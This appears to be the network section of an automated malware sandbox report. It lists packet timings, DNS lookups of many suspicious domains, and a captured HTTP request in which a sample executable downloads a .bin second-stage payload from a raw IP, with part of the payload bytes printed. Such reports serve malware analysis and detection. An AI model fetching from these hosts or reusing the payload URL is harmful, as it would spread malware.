Aug 2, 2023 20:40:36.948987007 CEST	80	49885	38.53.14.66	192.168.11.20
Aug 2, 2023 20:40:36.949054956 CEST	49885	80	192.168.11.20	38.53.14.66
Aug 2, 2023 20:40:36.949218035 CEST	49885	80	192.168.11.20	38.53.14.66
Aug 2, 2023 20:40:36.949922085 CEST	80	49885	38.53.14.66	192.168.11.20
Aug 2, 2023 20:40:36.949979067 CEST	80	49885	38.53.14.66	192.168.11.20
Aug 2, 2023 20:40:36.950103998 CEST	49885	80	192.168.11.20	38.53.14.66
Aug 2, 2023 20:40:36.950148106 CEST	49885	80	192.168.11.20	38.53.14.66
Aug 2, 2023 20:40:36.950246096 CEST	80	49885	38.53.14.66	192.168.11.20
Aug 2, 2023 20:40:36.950393915 CEST	49885	80	192.168.11.20	38.53.14.66
Aug 2, 2023 20:40:37.008874893 CEST	80	49885	38.53.14.66	192.168.11.20
Aug 2, 2023 20:40:37.009083986 CEST	49885	80	192.168.11.20	38.53.14.66
Aug 2, 2023 20:41:13.143929005 CEST	49887	80	192.168.11.20	34.102.136.180
Aug 2, 2023 20:41:13.159275055 CEST	80	49887	34.102.136.180	192.168.11.20
Aug 2, 2023 20:41:13.159554005 CEST	49887	80	192.168.11.20	34.102.136.180
Aug 2, 2023 20:41:13.159672976 CEST	49887	80	192.168.11.20	34.102.136.180
Aug 2, 2023 20:41:13.174894094 CEST	80	49887	34.102.136.180	192.168.11.20
Aug 2, 2023 20:41:13.415185928 CEST	80	49887	34.102.136.180	192.168.11.20
Aug 2, 2023 20:41:13.415199041 CEST	80	49887	34.102.136.180	192.168.11.20
Aug 2, 2023 20:41:13.415427923 CEST	49887	80	192.168.11.20	34.102.136.180
Aug 2, 2023 20:41:13.415507078 CEST	49887	80	192.168.11.20	34.102.136.180
Aug 2, 2023 20:41:13.430844069 CEST	80	49887	34.102.136.180	192.168.11.20
Aug 2, 2023 20:41:41.828151941 CEST	49888	80	192.168.11.20	8.212.100.103
Aug 2, 2023 20:41:42.024734020 CEST	80	49888	8.212.100.103	192.168.11.20
Aug 2, 2023 20:41:42.024976969 CEST	49888	80	192.168.11.20	8.212.100.103
Aug 2, 2023 20:41:42.025191069 CEST	49888	80	192.168.11.20	8.212.100.103
Aug 2, 2023 20:41:42.221395969 CEST	80	49888	8.212.100.103	192.168.11.20
Aug 2, 2023 20:41:42.222539902 CEST	80	49888	8.212.100.103	192.168.11.20
Aug 2, 2023 20:41:42.222570896 CEST	80	49888	8.212.100.103	192.168.11.20
Aug 2, 2023 20:41:42.222887993 CEST	49888	80	192.168.11.20	8.212.100.103
Aug 2, 2023 20:41:42.222887993 CEST	49888	80	192.168.11.20	8.212.100.103
Aug 2, 2023 20:41:42.419382095 CEST	80	49888	8.212.100.103	192.168.11.20
Aug 2, 2023 20:41:54.528369904 CEST	49889	80	192.168.11.20	195.110.124.133
Aug 2, 2023 20:41:54.557435036 CEST	80	49889	195.110.124.133	192.168.11.20
Aug 2, 2023 20:41:54.557791948 CEST	49889	80	192.168.11.20	195.110.124.133
Aug 2, 2023 20:41:54.557792902 CEST	49889	80	192.168.11.20	195.110.124.133
Aug 2, 2023 20:41:54.587174892 CEST	80	49889	195.110.124.133	192.168.11.20
Aug 2, 2023 20:41:54.590253115 CEST	80	49889	195.110.124.133	192.168.11.20
Aug 2, 2023 20:41:54.590337038 CEST	80	49889	195.110.124.133	192.168.11.20
Aug 2, 2023 20:41:54.591113091 CEST	49889	80	192.168.11.20	195.110.124.133
Aug 2, 2023 20:41:54.591113091 CEST	49889	80	192.168.11.20	195.110.124.133
Aug 2, 2023 20:41:54.622837067 CEST	80	49889	195.110.124.133	192.168.11.20
Aug 2, 2023 20:42:14.729136944 CEST	49890	80	192.168.11.20	107.148.132.46
Aug 2, 2023 20:42:14.890108109 CEST	80	49890	107.148.132.46	192.168.11.20
Aug 2, 2023 20:42:14.890357971 CEST	49890	80	192.168.11.20	107.148.132.46
Aug 2, 2023 20:42:14.890453100 CEST	49890	80	192.168.11.20	107.148.132.46
Aug 2, 2023 20:42:15.052189112 CEST	80	49890	107.148.132.46	192.168.11.20
Aug 2, 2023 20:42:15.055001020 CEST	80	49890	107.148.132.46	192.168.11.20
Aug 2, 2023 20:42:15.055082083 CEST	80	49890	107.148.132.46	192.168.11.20
Aug 2, 2023 20:42:15.055344105 CEST	49890	80	192.168.11.20	107.148.132.46
Aug 2, 2023 20:42:15.064352989 CEST	80	49890	107.148.132.46	192.168.11.20
Aug 2, 2023 20:42:15.064580917 CEST	49890	80	192.168.11.20	107.148.132.46
Aug 2, 2023 20:42:15.216815948 CEST	80	49890	107.148.132.46	192.168.11.20
Aug 2, 2023 20:42:35.673346996 CEST	49891	80	192.168.11.20	118.27.130.228
Aug 2, 2023 20:42:35.860708952 CEST	80	49891	118.27.130.228	192.168.11.20
Aug 2, 2023 20:42:35.861259937 CEST	49891	80	192.168.11.20	118.27.130.228
Aug 2, 2023 20:42:35.861361980 CEST	49891	80	192.168.11.20	118.27.130.228
Aug 2, 2023 20:42:36.048662901 CEST	80	49891	118.27.130.228	192.168.11.20
Aug 2, 2023 20:42:36.050338030 CEST	80	49891	118.27.130.228	192.168.11.20
Aug 2, 2023 20:42:36.050446987 CEST	80	49891	118.27.130.228	192.168.11.20
Aug 2, 2023 20:42:36.050688028 CEST	49891	80	192.168.11.20	118.27.130.228
Aug 2, 2023 20:42:36.050688982 CEST	49891	80	192.168.11.20	118.27.130.228
Aug 2, 2023 20:42:36.238015890 CEST	80	49891	118.27.130.228	192.168.11.20
Aug 2, 2023 20:42:56.459808111 CEST	49892	80	192.168.11.20	38.53.14.151
Aug 2, 2023 20:42:56.623140097 CEST	80	49892	38.53.14.151	192.168.11.20
Aug 2, 2023 20:42:56.623517036 CEST	49892	80	192.168.11.20	38.53.14.151
Aug 2, 2023 20:42:56.623517990 CEST	49892	80	192.168.11.20	38.53.14.151
Aug 2, 2023 20:42:57.063214064 CEST	49892	80	192.168.11.20	38.53.14.151
Aug 2, 2023 20:42:57.125792980 CEST	49892	80	192.168.11.20	38.53.14.151
Aug 2, 2023 20:42:57.295386076 CEST	80	49892	38.53.14.151	192.168.11.20
Aug 2, 2023 20:42:57.547570944 CEST	49892	80	192.168.11.20	38.53.14.151
Aug 2, 2023 20:42:57.712245941 CEST	80	49892	38.53.14.151	192.168.11.20
Aug 2, 2023 20:42:57.712502956 CEST	49892	80	192.168.11.20	38.53.14.151
Aug 2, 2023 20:42:59.270868063 CEST	80	49892	38.53.14.151	192.168.11.20
Aug 2, 2023 20:42:59.271178961 CEST	49892	80	192.168.11.20	38.53.14.151
Aug 2, 2023 20:43:17.278022051 CEST	49896	80	192.168.11.20	199.59.243.224
Aug 2, 2023 20:43:17.289146900 CEST	80	49896	199.59.243.224	192.168.11.20
Aug 2, 2023 20:43:17.289356947 CEST	49896	80	192.168.11.20	199.59.243.224
Aug 2, 2023 20:43:17.289401054 CEST	49896	80	192.168.11.20	199.59.243.224
Aug 2, 2023 20:43:17.301098108 CEST	80	49896	199.59.243.224	192.168.11.20
Aug 2, 2023 20:43:17.484226942 CEST	80	49896	199.59.243.224	192.168.11.20
Aug 2, 2023 20:43:17.484299898 CEST	80	49896	199.59.243.224	192.168.11.20
Aug 2, 2023 20:43:17.484349966 CEST	80	49896	199.59.243.224	192.168.11.20
Aug 2, 2023 20:43:17.484591961 CEST	49896	80	192.168.11.20	199.59.243.224
Aug 2, 2023 20:43:17.484591961 CEST	49896	80	192.168.11.20	199.59.243.224
Aug 2, 2023 20:43:17.484591961 CEST	49896	80	192.168.11.20	199.59.243.224
Aug 2, 2023 20:43:17.496897936 CEST	80	49896	199.59.243.224	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 2, 2023 20:36:06.263889074 CEST	63535	53	192.168.11.20	9.9.9.9
Aug 2, 2023 20:36:06.538566113 CEST	53	63535	9.9.9.9	192.168.11.20
Aug 2, 2023 20:36:27.039705992 CEST	50516	53	192.168.11.20	9.9.9.9
Aug 2, 2023 20:36:27.197257996 CEST	53	50516	9.9.9.9	192.168.11.20
Aug 2, 2023 20:36:47.378963947 CEST	62164	53	192.168.11.20	9.9.9.9
Aug 2, 2023 20:36:48.180471897 CEST	53	62164	9.9.9.9	192.168.11.20
Aug 2, 2023 20:37:08.655672073 CEST	51953	53	192.168.11.20	9.9.9.9
Aug 2, 2023 20:37:09.670677900 CEST	51953	53	192.168.11.20	1.1.1.1
Aug 2, 2023 20:37:10.211596966 CEST	53	51953	9.9.9.9	192.168.11.20
Aug 2, 2023 20:37:10.853471041 CEST	53	51953	1.1.1.1	192.168.11.20
Aug 2, 2023 20:37:28.651197910 CEST	55293	53	192.168.11.20	9.9.9.9
Aug 2, 2023 20:37:29.329257011 CEST	53	55293	9.9.9.9	192.168.11.20
Aug 2, 2023 20:37:49.740191936 CEST	54401	53	192.168.11.20	9.9.9.9
Aug 2, 2023 20:37:50.041547060 CEST	53	54401	9.9.9.9	192.168.11.20
Aug 2, 2023 20:38:10.535574913 CEST	64524	53	192.168.11.20	9.9.9.9
Aug 2, 2023 20:38:10.589879990 CEST	53	64524	9.9.9.9	192.168.11.20
Aug 2, 2023 20:38:31.262454033 CEST	60905	53	192.168.11.20	9.9.9.9
Aug 2, 2023 20:38:31.437184095 CEST	53	60905	9.9.9.9	192.168.11.20
Aug 2, 2023 20:38:51.758033037 CEST	62842	53	192.168.11.20	9.9.9.9
Aug 2, 2023 20:38:51.925118923 CEST	53	62842	9.9.9.9	192.168.11.20
Aug 2, 2023 20:39:12.065918922 CEST	60150	53	192.168.11.20	9.9.9.9
Aug 2, 2023 20:39:12.159744024 CEST	53	60150	9.9.9.9	192.168.11.20
Aug 2, 2023 20:39:32.389547110 CEST	52262	53	192.168.11.20	9.9.9.9
Aug 2, 2023 20:39:32.678479910 CEST	53	52262	9.9.9.9	192.168.11.20
Aug 2, 2023 20:39:52.822691917 CEST	53752	53	192.168.11.20	9.9.9.9
Aug 2, 2023 20:39:53.015746117 CEST	53	53752	9.9.9.9	192.168.11.20
Aug 2, 2023 20:40:13.224870920 CEST	59142	53	192.168.11.20	9.9.9.9
Aug 2, 2023 20:40:13.668392897 CEST	53	59142	9.9.9.9	192.168.11.20
Aug 2, 2023 20:40:34.016730070 CEST	52995	53	192.168.11.20	9.9.9.9
Aug 2, 2023 20:40:35.031961918 CEST	52995	53	192.168.11.20	1.1.1.1
Aug 2, 2023 20:40:36.047178984 CEST	52995	53	192.168.11.20	9.9.9.9
Aug 2, 2023 20:40:36.163882017 CEST	53	52995	9.9.9.9	192.168.11.20
Aug 2, 2023 20:40:36.163960934 CEST	53	52995	9.9.9.9	192.168.11.20
Aug 2, 2023 20:40:36.492258072 CEST	53	52995	1.1.1.1	192.168.11.20
Aug 2, 2023 20:41:13.117537975 CEST	49778	53	192.168.11.20	9.9.9.9
Aug 2, 2023 20:41:13.143282890 CEST	53	49778	9.9.9.9	192.168.11.20
Aug 2, 2023 20:41:41.189862013 CEST	59288	53	192.168.11.20	9.9.9.9
Aug 2, 2023 20:41:41.827357054 CEST	53	59288	9.9.9.9	192.168.11.20
Aug 2, 2023 20:41:54.311726093 CEST	56377	53	192.168.11.20	9.9.9.9
Aug 2, 2023 20:41:54.527622938 CEST	53	56377	9.9.9.9	192.168.11.20
Aug 2, 2023 20:42:35.193490028 CEST	50407	53	192.168.11.20	9.9.9.9
Aug 2, 2023 20:42:35.672508955 CEST	53	50407	9.9.9.9	192.168.11.20
Aug 2, 2023 20:42:56.188745022 CEST	53410	53	192.168.11.20	9.9.9.9
Aug 2, 2023 20:42:56.458961010 CEST	53	53410	9.9.9.9	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 2, 2023 20:36:06.263889074 CEST	192.168.11.20	9.9.9.9	0xc8b7	Standard query (0)	www.qwevqgjw.cfd	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:36:27.039705992 CEST	192.168.11.20	9.9.9.9	0xdfc	Standard query (0)	www.lasik-de-de-8808230.zone	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:36:47.378963947 CEST	192.168.11.20	9.9.9.9	0x2ea9	Standard query (0)	www.qhrxnxoe.cfd	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:37:08.655672073 CEST	192.168.11.20	9.9.9.9	0xcc31	Standard query (0)	www.sxbhpysr.cfd	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:37:09.670677900 CEST	192.168.11.20	1.1.1.1	0xcc31	Standard query (0)	www.sxbhpysr.cfd	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:37:28.651197910 CEST	192.168.11.20	9.9.9.9	0x5a43	Standard query (0)	www.venria.store	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:37:49.740191936 CEST	192.168.11.20	9.9.9.9	0x904e	Standard query (0)	www.zbjcolwy.cfd	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:38:10.535574913 CEST	192.168.11.20	9.9.9.9	0xe215	Standard query (0)	www.ypasbfxplu.shop	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:38:31.262454033 CEST	192.168.11.20	9.9.9.9	0x33bd	Standard query (0)	www.nihil.one	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:38:51.758033037 CEST	192.168.11.20	9.9.9.9	0xdd1b	Standard query (0)	www.wshaizapp.site	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:39:12.065918922 CEST	192.168.11.20	9.9.9.9	0xec3b	Standard query (0)	www.lilith-con.com	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:39:32.389547110 CEST	192.168.11.20	9.9.9.9	0x62a4	Standard query (0)	www.civzbpp.xyz	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:39:52.822691917 CEST	192.168.11.20	9.9.9.9	0x79f0	Standard query (0)	www.lojaasoriginais.online	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:40:13.224870920 CEST	192.168.11.20	9.9.9.9	0x6dab	Standard query (0)	www.aniwatch.top	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:40:34.016730070 CEST	192.168.11.20	9.9.9.9	0xd091	Standard query (0)	www.genqaagz.cfd	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:40:35.031961918 CEST	192.168.11.20	1.1.1.1	0xd091	Standard query (0)	www.genqaagz.cfd	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:40:36.047178984 CEST	192.168.11.20	9.9.9.9	0xd091	Standard query (0)	www.genqaagz.cfd	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:41:13.117537975 CEST	192.168.11.20	9.9.9.9	0xd557	Standard query (0)	www.duffledash.com	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:41:41.189862013 CEST	192.168.11.20	9.9.9.9	0xd6e9	Standard query (0)	www.aqeabrdm.cfd	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:41:54.311726093 CEST	192.168.11.20	9.9.9.9	0x97d9	Standard query (0)	www.cacciatoridiofferte.com	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:42:35.193490028 CEST	192.168.11.20	9.9.9.9	0x9d81	Standard query (0)	www.peterscanner.com	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:42:56.188745022 CEST	192.168.11.20	9.9.9.9	0xe60a	Standard query (0)	www.pgtjirqx.cfd	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 2, 2023 20:36:06.538566113 CEST	9.9.9.9	192.168.11.20	0xc8b7	No error (0)	www.qwevqgjw.cfd		199.188.104.120	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:36:27.197257996 CEST	9.9.9.9	192.168.11.20	0xdfc	No error (0)	www.lasik-de-de-8808230.zone	ssl1.prod.systemdragon.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 2, 2023 20:36:27.197257996 CEST	9.9.9.9	192.168.11.20	0xdfc	No error (0)	ssl1.prod.systemdragon.com		104.17.157.1	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:36:27.197257996 CEST	9.9.9.9	192.168.11.20	0xdfc	No error (0)	ssl1.prod.systemdragon.com		104.17.158.1	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:36:48.180471897 CEST	9.9.9.9	192.168.11.20	0x2ea9	No error (0)	www.qhrxnxoe.cfd		107.148.132.46	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:37:10.211596966 CEST	9.9.9.9	192.168.11.20	0xcc31	No error (0)	www.sxbhpysr.cfd	dwerweima01.cn		CNAME (Canonical name)	IN (0x0001)	false
Aug 2, 2023 20:37:10.211596966 CEST	9.9.9.9	192.168.11.20	0xcc31	No error (0)	dwerweima01.cn		52.76.96.91	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:37:10.853471041 CEST	1.1.1.1	192.168.11.20	0xcc31	No error (0)	www.sxbhpysr.cfd	dwerweima01.cn		CNAME (Canonical name)	IN (0x0001)	false
Aug 2, 2023 20:37:10.853471041 CEST	1.1.1.1	192.168.11.20	0xcc31	No error (0)	dwerweima01.cn		52.76.96.91	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:37:29.329257011 CEST	9.9.9.9	192.168.11.20	0x5a43	No error (0)	www.venria.store	venria.store		CNAME (Canonical name)	IN (0x0001)	false
Aug 2, 2023 20:37:29.329257011 CEST	9.9.9.9	192.168.11.20	0x5a43	No error (0)	venria.store		198.252.102.187	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:37:50.041547060 CEST	9.9.9.9	192.168.11.20	0x904e	No error (0)	www.zbjcolwy.cfd		107.148.83.209	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:38:10.589879990 CEST	9.9.9.9	192.168.11.20	0xe215	No error (0)	www.ypasbfxplu.shop		188.114.97.14	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:38:10.589879990 CEST	9.9.9.9	192.168.11.20	0xe215	No error (0)	www.ypasbfxplu.shop		188.114.96.14	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:38:31.437184095 CEST	9.9.9.9	192.168.11.20	0x33bd	No error (0)	www.nihil.one		45.77.219.226	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:38:51.925118923 CEST	9.9.9.9	192.168.11.20	0xdd1b	Name error (3)	www.wshaizapp.site	none	none	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:39:12.159744024 CEST	9.9.9.9	192.168.11.20	0xec3b	No error (0)	www.lilith-con.com	lilith-con.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 2, 2023 20:39:12.159744024 CEST	9.9.9.9	192.168.11.20	0xec3b	No error (0)	lilith-con.com		185.238.87.6	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:39:32.678479910 CEST	9.9.9.9	192.168.11.20	0x62a4	Name error (3)	www.civzbpp.xyz	none	none	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:39:53.015746117 CEST	9.9.9.9	192.168.11.20	0x79f0	No error (0)	www.lojaasoriginais.online	lojaasoriginais.online		CNAME (Canonical name)	IN (0x0001)	false
Aug 2, 2023 20:39:53.015746117 CEST	9.9.9.9	192.168.11.20	0x79f0	No error (0)	lojaasoriginais.online		23.227.38.65	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:40:13.668392897 CEST	9.9.9.9	192.168.11.20	0x6dab	No error (0)	www.aniwatch.top		199.59.243.224	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:40:36.163882017 CEST	9.9.9.9	192.168.11.20	0xd091	No error (0)	www.genqaagz.cfd		38.53.14.66	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:40:36.163960934 CEST	9.9.9.9	192.168.11.20	0xd091	No error (0)	www.genqaagz.cfd		38.53.14.66	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:40:36.492258072 CEST	1.1.1.1	192.168.11.20	0xd091	No error (0)	www.genqaagz.cfd		38.53.14.66	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:41:13.143282890 CEST	9.9.9.9	192.168.11.20	0xd557	No error (0)	www.duffledash.com	duffledash.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 2, 2023 20:41:13.143282890 CEST	9.9.9.9	192.168.11.20	0xd557	No error (0)	duffledash.com		34.102.136.180	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:41:41.827357054 CEST	9.9.9.9	192.168.11.20	0xd6e9	No error (0)	www.aqeabrdm.cfd	xqw1666688.top		CNAME (Canonical name)	IN (0x0001)	false
Aug 2, 2023 20:41:41.827357054 CEST	9.9.9.9	192.168.11.20	0xd6e9	No error (0)	xqw1666688.top		8.212.100.103	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:41:54.527622938 CEST	9.9.9.9	192.168.11.20	0x97d9	No error (0)	www.cacciatoridiofferte.com	cacciatoridiofferte.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 2, 2023 20:41:54.527622938 CEST	9.9.9.9	192.168.11.20	0x97d9	No error (0)	cacciatoridiofferte.com		195.110.124.133	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:42:35.672508955 CEST	9.9.9.9	192.168.11.20	0x9d81	No error (0)	www.peterscanner.com		118.27.130.228	A (IP address)	IN (0x0001)	false
Aug 2, 2023 20:42:56.458961010 CEST	9.9.9.9	192.168.11.20	0xe60a	No error (0)	www.pgtjirqx.cfd		38.53.14.151	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

198.46.176.189

www.qwevqgjw.cfd

www.lasik-de-de-8808230.zone

www.qhrxnxoe.cfd

www.sxbhpysr.cfd

www.venria.store

www.zbjcolwy.cfd

www.ypasbfxplu.shop

www.nihil.one

www.lilith-con.com

www.lojaasoriginais.online

www.aniwatch.top

www.genqaagz.cfd

www.duffledash.com

www.aqeabrdm.cfd

www.cacciatoridiofferte.com

www.peterscanner.com

www.pgtjirqx.cfd

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49842	198.46.176.189	80	C:\Users\user\Desktop\wLlREXsA9M.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2023 20:35:21.593019009 CEST	54	OUT	GET /windows/kHjzvgNVUFKkek92.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 198.46.176.189 Cache-Control: no-cache
Aug 2, 2023 20:35:21.728261948 CEST	56	IN	HTTP/1.1 200 OK Date: Wed, 02 Aug 2023 18:35:21 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 Last-Modified: Tue, 01 Aug 2023 16:10:36 GMT ETag: "2e240-601dec996e968" Accept-Ranges: bytes Content-Length: 188992 Content-Type: application/octet-stream Data Raw: 51 97 55 e1 fd db 4b f0 0e c4 0b 0b 76 b3 60 7d 77 8d 15 83 26 11 d2 34 36 c1 ae 14 c0 c3 62 6a bc 15 76 8d 59 9f 2b 66 04 bd ac 35 43 26 22 1b 85 51 ff 35 bc e4 18 7e 58 8e 7e 11 53 9e 6d 8c 1e 72 de 00 05 a5 36 3b 7a a0 a4 39 8f e1 79 e8 f5 bc 50 2d b9 ae 7d f1 5c 6c ed 56 06 1e bd 09 24 ca 6e 1f 64 ee d3 4a 0e dc 77 0b c9 11 f6 0f 29 52 0d 59 9b e2 04 2e 69 18 a0 8f 1e 83 93 ea 2d 63 05 7c 12 e3 bc 38 74 ae 8a db 4f ce a7 46 e4 14 35 40 db 7c 56 44 ce 0e 58 56 14 55 b2 06 65 f3 d0 26 7b 64 4e 31 e1 c3 d0 db f6 76 6b e7 5a 7a f6 20 b3 ca 94 c5 d9 6c bd 16 a4 43 36 b0 04 88 83 03 11 bf 6f 28 29 95 5d c3 3b 9c e0 c9 ba d4 ca ce ba 94 b5 53 be 56 35 0d c4 12 44 36 c0 42 28 a6 cd 61 22 a7 ba be d5 e1 b3 ed 90 f4 b6 56 9e 23 3d d7 91 67 c9 d2 d9 a2 19 a5 c7 f7 57 fe c2 9c dc 5f 6e e1 66 5f ac 5c 3e ae 8c 2b ad 01 1d 5f f6 87 7d af 8b 97 5e 86 bd 2d 0e ba 5b ee 2b e4 d2 92 b0 f0 bd 91 3c 23 01 df 68 61 45 61 ab f8 32 6e c6 a9 60 fc 4d a2 8f bd ed ca 3a 9f d9 89 e1 7d 73 12 74 02 5d c9 ae d4 89 a9 c3 5b 4f 2c 61 de 9b 58 0e 4a de 51 d6 00 b7 21 c2 c8 ff d4 b9 27 ad 04 fb 19 2c 09 2d 11 86 6f 8c 5a 52 75 7d 81 83 85 2a 9a a5 18 9d 24 ad b3 1a 74 7b f0 3f e8 72 64 a0 1d 5d 78 01 9f ee 75 95 4a 24 91 0a 1c 30 6f b0 bf 16 a3 33 2e c4 2c 27 69 b4 12 18 78 8c f8 9b e2 53 af 76 9c d7 5c b7 f3 95 26 7d 14 94 ac 95 e9 ef 0e 5d c5 3e 9a 7f b3 cc b6 7d 78 73 ca c9 48 d9 db c7 de 2f 71 85 cb 2c 43 85 b3 d1 75 ac 24 1c 5e 25 49 29 f1 0e df 73 38 17 5c 1b 8d cf c9 a4 4c 38 15 c5 68 fe 21 7f 46 de 67 42 d8 20 63 1c be db 73 dd d7 8d fb ca a6 df d9 e1 48 c6 35 45 14 77 b2 9b c2 1d fc c9 78 cb ba 55 c0 c5 3f 1a ab d8 58 61 69 22 a5 bd 60 3f f1 a9 69 53 bc 43 72 b4 4c b0 d8 74 16 b0 d1 2c c3 ec 0d fd 95 d7 09 22 2b 10 04 74 27 3b d7 3f c0 49 f2 c3 03 d3 3b eb fc 39 91 96 9e b3 fb 12 f0 aa b9 9c 73 43 32 2b 0d 7c e9 42 13 57 e7 b4 6f 70 a0 42 77 bc d2 d0 18 0c 76 10 72 96 2b fa 8a b9 08 ab d7 d1 56 88 ea cd b8 ba 75 af 75 54 37 1b ca df c1 7f 6e 53 f1 53 88 93 82 1b 21 66 d3 e5 2e e6 50 9f 57 6e 0d 60 41 77 2c 52 6d b9 cc 62 f7 cb fa a0 c3 86 da 41 6c 9b bb e6 cd 3c 23 e9 d3 bd a2 17 22 a7 78 92 d2 17 83 68 13 67 1d 19 f7 91 56 16 b9 3e dd 5c 04 a3 b6 8c a9 78 fa e7 b6 83 91 cb 81 21 6c af 31 d0 6a c2 ec 23 d8 21 5b 0a 18 4d 97 19 03 e9 06 4d 19 3a 0d 00 5d 1e 4e c0 37 ca d1 54 9d 71 c8 29 b5 00 68 6c d3 cd c7 09 8a 29 28 d9 b6 34 96 ca 27 0f 54 5a 59 ee 46 f5 60 01 6a ef 46 df 21 01 60 8c 85 6e 41 ad 77 63 c9 0b ea b3 9f 80 e5 a5 18 e1 83 36 2f b8 84 49 96 ed 69 c7 ce d0 df 21 a2 32 a7 ce a9 9c ba 05 9a 86 bd 9a 85 5f 42 9c f8 cd ed 4f e6 e8 6c ad f6 50 25 b2 bb 50 0b be a3 a0 5a 2a e5 75 4c fa 6e 21 dd 8a 4c c9 37 23 58 0d 0d c7 be ed d4 7c c3 a3 45 06 97 22 db 4c 56 7c bf fe 93 c6 6a 57 b9 8a 40 c3 95 cf e1 87 46 44 c7 d4 95 8f 04 09 99 11 1b 60 ac c8 80 f9 4b e6 90 68 d9 8a 82 60 c1 6f de 34 85 c8 db 78 ab 60 6e 57 15 be 15 42 02 c0 9e 14 f6 a6 f8 29 7c f1 e3 62 56 7c 93 cc 98 79 76 ce cc c3 d1 24 be 0a c7 59 f6 2f c4 33 cb 88 aa 83 74 78 9a 41 7a 81 0b 38 42 86 9c a8 fb 88 62 de 90 64 54 20 55 2a a4 Data Ascii: QUKv`}w&46bjvY+f5C&"Q5~X~Smr6;z9yP-}\lV$ndJw)RY.i-c\|8tOF5@\|VDXVUe&{dN1vkZz lC6o()];SV5D6B(a"V#=gW_nf_\>+_}^-[+<#haEa2n`M:}st][O,aXJQ!',-oZRu}$t{?rd]xuJ$0o3.,'ixSv\&}]>}xsH/q,Cu$^%I)s8\L8h!FgB csH5EwxU?Xai"`?iSCrLt,"+t';?I;9sC2+\|BWopBwvr+VuuT7nSS!f.PWn`Aw,RmbAl<#"xhgV>\x!l1j#![MM:]N7Tq)hl)(4'TZYF`jF!`nAwc6/Ii!2_BOlP%PZuLn!L7#X\|E"LV\|jW@FD`Kh`o4x`nWB)\|bV\|yv$Y/3txAz8BbdT U*
Aug 2, 2023 20:35:21.728357077 CEST	57	IN	Data Raw: 69 44 4b be 0a 0c 49 65 0e ce bd 2b 0f 41 e1 42 04 75 27 4a f7 a0 f5 5d a6 69 03 63 fc 94 69 49 b3 ab 52 66 8c 45 51 10 65 56 d1 fc 0d 19 c8 c5 5f b7 91 d0 19 fc b6 cf e2 54 ae 86 3c eb a5 b2 a0 9f bb e1 82 37 e3 73 5d f5 36 19 89 5d ef cf 83 2f Data Ascii: iDKIe+ABu'J]iciIRfEQeV_T<7s]6]/kY3vOp}D\|7 =s2wV_Wpb{kxQwQQ7'dbE<J(whiav#EHG[#rv)%\|{)4{\u)ma<D~o
